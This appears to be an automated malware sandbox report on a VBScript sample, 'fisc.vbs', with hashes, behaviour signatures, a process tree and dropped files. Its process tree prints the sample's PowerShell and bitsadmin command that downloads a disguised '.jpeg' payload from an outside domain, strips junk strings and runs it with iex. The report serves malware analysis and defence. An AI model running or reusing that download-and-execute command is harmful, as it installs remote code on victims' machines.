
Resubmissions

  • 230601-q6laesee79 (01/06/2023, 13:52), score: 6
  • 230601-q6be8aeh6y (01/06/2023, 13:51), score: 6
  • 230601-q4w9xaeh6v (01/06/2023, 13:49), score: 6
  • 230601-q4bcfaeh51 (01/06/2023, 13:48), score: 6
  • 230601-q2vy3aee58 (01/06/2023, 13:45), score: 6
  • 230601-qz6msaeh5t (01/06/2023, 13:42), score: 7
  • 220525-l3xrtsdfbm (25/05/2022, 10:04), score: 7

Analysis

  • max time kernel: 55s
  • max time network: 63s
  • platform: windows10-1703_x64
  • resource: win10-20230220-en
  • resource tags: arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
  • submitted: 01/06/2023, 13:42

General

  • Target: fisc.vbs
  • Size: 607B
  • MD5: 7e9280027235462727a9a351429725c6
  • SHA1: 380f1b3eeb2779a4359e4ca52471273983ed684c
  • SHA256: 11a9b5a24b628be56d2d2bedf1ed71f05114c2f670cd1814ff8f8ff222cd801a
  • SHA512: 7e31dcff6590b79476bb9bedd73145b9acafea62202d8defdd12608eae4cf727dce8781b83cd14d51432f2989bc6376c0a5bb8a114397c504a1ea4d519b4e060

Score: 7/10

Malware Config

Signatures

  • Checks computer location settings (2 TTPs, 1 IoC)
    Looks up country code configured in the registry, likely geofence.
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • Download via BitsAdmin (1 TTP, 1 IoC)
  • Modifies registry class (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (3 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Windows\System32\WScript.exe (PID 2476)
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fisc.vbs"
    Signatures: Checks computer location settings; Modifies registry class; Suspicious use of WriteProcessMemory
    • C:\Windows\system32\cmd.exe (PID 1484)
      "C:\Windows\system32\cmd.exe" /c powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"
      Signatures: Suspicious use of WriteProcessMemory
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1452)
        powershell -c "&{bitsadmin /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg; $ah=gc C:\Users\Admin\AppData\Roaming\production.jpeg; $ah -replace 'rfkvkhyy|wvgpmnbgx|xhbtegpohq|evvdwlxcd|gisofqvjp|edvdpyzc|uqbykfuhv' |iex }"
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        • C:\Windows\system32\bitsadmin.exe (PID 4688)
          "C:\Windows\system32\bitsadmin.exe" /transfer orhwgxcl https://jopkerto.tech/avatar/6735/production.jpeg C:\Users\Admin\AppData\Roaming\production.jpeg
          Signatures: Download via BitsAdmin
  • C:\Windows\System32\rundll32.exe (PID 700)
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  • \??\c:\windows\system32\svchost.exe (PID 5020)
    c:\windows\system32\svchost.exe -k localservice -s fdPHost

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q5pwosvi.noi.ps1 (1B)
    MD5: c4ca4238a0b923820dcc509a6f75849b
    SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
    SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
    SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
  • C:\Users\Public\Downloads\vcmeunewnaj.lnk (652B)
    MD5: 671edceeceed4b8d01725b17bb334014
    SHA1: f1b1e5909d6cb622c6133c92c775e022c7fb0edb
    SHA256: 93d8ed1c1a490a5384e0d19a399e95b60f67880af242cf77955e8f53202adcf8
    SHA512: 1ff5f1549a01cb21e7ab285acd9c4fea328693a66375f5effbd89f577c4557b4a7eb4722de8d084b46012fce3d05bfe2f42ba639f895e2d089bc52db517d8722
  • memory/1452-154-0x0000029527F10000-0x0000029527F32000-memory.dmp (136KB)
  • memory/1452-157-0x00000295280C0000-0x0000029528136000-memory.dmp (472KB)
  • memory/1452-168-0x0000029527DD0000-0x0000029527DE0000-memory.dmp (64KB)
  • memory/1452-169-0x0000029527DD0000-0x0000029527DE0000-memory.dmp (64KB)
  • memory/1452-170-0x0000029527DD0000-0x0000029527DE0000-memory.dmp (64KB)